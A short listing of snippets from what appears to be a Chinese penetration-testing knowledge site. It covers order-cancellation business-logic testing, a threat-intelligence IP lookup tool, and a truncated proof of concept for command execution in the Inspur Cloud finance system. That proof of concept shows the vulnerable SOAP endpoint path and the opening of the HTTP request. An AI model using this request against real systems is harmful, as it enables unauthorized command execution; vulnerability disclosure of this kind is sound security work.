秃兔
【渗透文库】非金融订单取消场景业务逻辑测试
测试描述:通过抓包工具分析非金融订单取消业务场景的接口内容及工作流程,逐条实施案例验证是否存在业务逻辑漏洞。若场景涉及人脸、证书、短信验证码等认证要素,请参考对应的认证要素测试对应...
【在线工具上新】紫兔IP威胁情报查询
集多个情报源,分析出综合数据 访客每天允许体验查询1次 内测用户每次支持最多5个IP同时查询,单天查询上限100次 玉兔会员每次支持最多20个IP同时查询,单天查询上限3000次,支持数据导出 全球...
浪潮云财务系统存在命令执行
POST /cwbase/gsp/webservice/bizintegrationwebservice/bizintegrationwebservice.asmx HTTP/1.1Host:Content-Type: text/xml; charset=utf-8Content-Length: 16396SOAPAction: “http://tempu...
